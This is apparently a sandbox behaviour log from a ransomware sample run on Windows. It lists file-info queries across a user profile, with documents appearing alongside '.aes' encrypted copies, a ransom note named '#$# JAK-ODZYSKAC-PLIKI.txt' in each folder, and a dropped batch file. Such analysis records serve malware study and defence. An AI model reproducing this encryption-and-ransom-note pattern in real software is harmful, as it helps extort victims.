| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~ | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Feeds Cache | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Feeds Cache\1NBUR4HR | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Feeds Cache\6ASVN7J7 | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Feeds Cache\D68G7BIJ | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Feeds Cache\KQMHSVKD | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\FORMS | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\IME12 | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\IMJP12 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\IMJP8_1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\IMJP9_0 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Internet Explorer | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Internet Explorer\Recovery | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Internet Explorer\Recovery\Active | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Internet Explorer\Recovery\Last Active | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Media Player | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Media Player\Sync Playlists | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0000E2DF | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00010C6E | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Office | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Office\12.0 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Office\ONetConfig | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Outlook | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\TaskSchedulerConfig | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Visio | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\1033 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\Burn | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\Burn\Burn | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\Burn\Burn1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\Burn\Burn2 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\Caches | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\Explorer | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\GameExplorer | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101720171018 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Temp\Deployment | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Temp\hsperfdata_kFT6uTQW | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Temp\lilo.144 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Temp\Low | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Temp\Microsoft .NET Framework 4 Setup_4.0.30319 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Temp\Microsoft Visual C++ 2010 x64 Redistributable Setup_10.0.40219 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.40219 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Temp\outlook logging | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Temp\Setup000006d8 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Temp\WPDNSE | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Temp\~nsu.tmp | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Temporary Internet Files | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\VirtualStore | type = file_attributes |
|
1 | |
| Get Info | C:\ProgramData\Adobe | type = file_attributes |
|
1 | |
| Get Info | C:\ProgramData\Adobe\Acrobat | type = file_attributes |
|
1 | |
| Get Info | C:\ProgramData\Adobe\Acrobat\10.0 | type = file_attributes |
|
1 | |
| Get Info | C:\ProgramData\Adobe\Acrobat\10.0\Replicate | type = file_attributes |
|
1 | |
| Get Info | C:\ProgramData\Adobe\Acrobat\10.0\Replicate\Security | type = file_attributes |
|
1 | |
| Get Info | C:\ProgramData\Adobe\ARM | type = file_attributes |
|
1 | |
| Get Info | C:\ProgramData\Adobe\ARM\Reader_10.0.0 | type = file_attributes |
|
1 | |
| Get Info | C:\ProgramData\Adobe\ARM\Reader_10.0.0\10412 | type = file_attributes |
|
1 | |
| Get Info | C:\ProgramData\Application Data | type = file_attributes |
|
1 | |
| Get Info | C:\ProgramData\Desktop | type = file_attributes |
|
1 | |
| Get Info | C:\ProgramData\Documents | type = file_attributes |
|
1 | |
| Get Info | C:\ProgramData\Favorites | type = file_attributes |
|
1 | |
| Get Info | C:\ProgramData\Keyboard | type = file_attributes |
|
1 | |
| Get Info | C:\ProgramData\Microsoft | type = file_attributes |
|
2 | |
| Get Info | C:\ProgramData\Microsoft\Assistance | type = file_attributes |
|
2 | |
| Get Info | C:\ProgramData\Microsoft\Assistance\Client | type = file_attributes |
|
2 | |
| Get Info | C:\ProgramData\Microsoft\Assistance\Client\1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US | type = file_attributes |
|
2 | |
| Get Info | C:\ProgramData\Microsoft\Crypto | type = file_attributes |
|
2 | |
| Get Info | C:\ProgramData\Microsoft\Crypto\DSS | type = file_attributes |
|
2 | |
| Get Info | C:\ProgramData\Microsoft\Crypto\DSS\MachineKeys | type = file_attributes |
|
2 | |
| Get Info | C:\ProgramData\Microsoft\Crypto\Keys | type = file_attributes |
|
2 | |
| Get Info | C:\ProgramData\Microsoft\Crypto\RSA | type = file_attributes |
|
2 | |
| Get Info | C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys | type = file_attributes |
|
2 | |
| Get Info | C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18 | type = file_attributes |
|
2 | |
| Get Info | C:\ProgramData\Microsoft\Device Stage | type = file_attributes |
|
1 | |
| Get Info | C:\ProgramData\Microsoft\Device Stage\Device | type = file_attributes |
|
1 | |
| Get Info | C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0} | type = file_attributes |
|
1 | |
| Get Info | C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120} | type = file_attributes |
|
1 | |
| Get Info | C:\ProgramData\Microsoft\Device Stage\Task | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\nVO-4P-KzZ-c6DO0e\1BUS.odt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\nVO-4P-KzZ-c6DO0e\1BUS.odt | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\nVO-4P-KzZ-c6DO0e\1BUS.odt.aes | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\nVO-4P-KzZ-c6DO0e\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\nVO-4P-KzZ-c6DO0e\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\nVO-4P-KzZ-c6DO0e\b-s_mvDIaHRjA WonYD7.csv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\nVO-4P-KzZ-c6DO0e\b-s_mvDIaHRjA WonYD7.csv | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\nVO-4P-KzZ-c6DO0e\b-s_mvDIaHRjA WonYD7.csv.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\nVO-4P-KzZ-c6DO0e\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\3fRpiUpvJo9PXh.doc | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\3fRpiUpvJo9PXh.doc | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\3fRpiUpvJo9PXh.doc.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\7wlDZE9WQQHKod.odp | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\7wlDZE9WQQHKod.odp | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\7wlDZE9WQQHKod.odp.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
4 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\hvCemxS1iSlcK.doc | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\hvCemxS1iSlcK.doc | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\hvCemxS1iSlcK.doc.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\pA730znoL5.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\pA730znoL5.rtf | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\pA730znoL5.rtf.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\_X864G9NgHeHTp16YW.ods | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\_X864G9NgHeHTp16YW.ods | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\_X864G9NgHeHTp16YW.ods.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures | type = file_attributes |
|
3 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\hGZFj | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\TmdCgSua1hPeIxp_g-_ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\vuewIfEOk | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\vGEj4z4hhmv\w26w | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\0qp cbTp2kDuTxPhn8y.csv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\0qp cbTp2kDuTxPhn8y.csv | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\0qp cbTp2kDuTxPhn8y.csv.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\F6P3h-e5k60SlJ.pdf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\F6P3h-e5k60SlJ.pdf | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\F6P3h-e5k60SlJ.pdf.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
4 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\iUfdaFezBB3P- l4I3e.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\iUfdaFezBB3P- l4I3e.rtf | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\iUfdaFezBB3P- l4I3e.rtf.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\pWQHqSJInPvfKbJkRZb.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\pWQHqSJInPvfKbJkRZb.rtf | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\pWQHqSJInPvfKbJkRZb.rtf.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\t8rijBa3r5rIl.pptx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\t8rijBa3r5rIl.pptx | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\t8rijBa3r5rIl.pptx.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Music | type = file_attributes |
|
3 | |
| Get Info | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\oGal6NmV2cY0e3 6 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\sPKPdtJk | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\sPKPdtJk\clNOjUrNMvl | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\sPKPdtJk\clNOjUrNMvl\D XgP5yxO | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\sPKPdtJk\clNOjUrNMvl\miHhH | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Music\e1mt wOaqipijv7EcVN\sPKPdtJk\clNOjUrNMvl\_bCyujY | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\0_b3IJRL61ikm2.xls | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\0_b3IJRL61ikm2.xls | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\0_b3IJRL61ikm2.xls.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\568WxqKDq_FIMwoN.pdf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\568WxqKDq_FIMwoN.pdf | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\568WxqKDq_FIMwoN.pdf.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
6 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\8m1FCp.ots | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\8m1FCp.ots | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\8m1FCp.ots.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\p2QHvHrC07x 6M.odt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\p2QHvHrC07x 6M.odt | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\p2QHvHrC07x 6M.odt.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\URm66b8mfK_B.docx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\URm66b8mfK_B.docx | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\URm66b8mfK_B.docx.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\vfwuhDCvzF0GRto.pptx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\vfwuhDCvzF0GRto.pptx | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\vfwuhDCvzF0GRto.pptx.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Videos | type = file_attributes |
|
3 | |
| Get Info | C:\Users\kFT6uTQW\Videos\extoA | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv\Eyqf5KSeCaMN6njljm | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv\LNVGgurmVCVr5ekCq-4 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv\uXWBnEhIHTl8W | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Videos\extoA\5rxjC 2TW9I2cmhDLv\WQHnOCgB21aCcC | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Videos\extoA\IjyI ku9gKWYYPFGATz | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Videos\extoA\r-_fU8vdku2TwrL | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\wVF JPe1b.xls | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\wVF JPe1b.xls | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\wVF JPe1b.xls.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\n1mKD81VKeIa7S2.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\n1mKD81VKeIa7S2.rtf | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\n1mKD81VKeIa7S2.rtf.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\ORRmspMNhOgtvaB.doc | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\ORRmspMNhOgtvaB.doc | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\ORRmspMNhOgtvaB.doc.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaminghhfhqi2h.wln.bat | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Desktop | type = file_attributes |
|
3 | |
| Get Info | C:\Users\kFT6uTQW\Desktop\1ZxEG6XM | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Desktop\1ZxEG6XM\cNh | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Desktop\N DTF4xE4-dKUqMoR | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Desktop\_KMnL2J | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
3 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\PP5 bxjS.pptx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\PP5 bxjS.pptx | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\PP5 bxjS.pptx.aes | type = file_type |
|
2 | |
| Get Info | type = file_type |
|
1 | ||
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\xlyLS6yx0MIco1.pps | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\xlyLS6yx0MIco1.pps | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\xlyLS6yx0MIco1.pps.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\-GJqEDw.odt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\-GJqEDw.odt | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\-GJqEDw.odt.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\8pUhJoF5OUB0zF3kJ4pk.ods | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\8pUhJoF5OUB0zF3kJ4pk.ods | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\8pUhJoF5OUB0zF3kJ4pk.ods.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
5 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\eQOV.odp | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\eQOV.odp | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\eQOV.odp.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Favorites | type = file_attributes |
|
3 | |
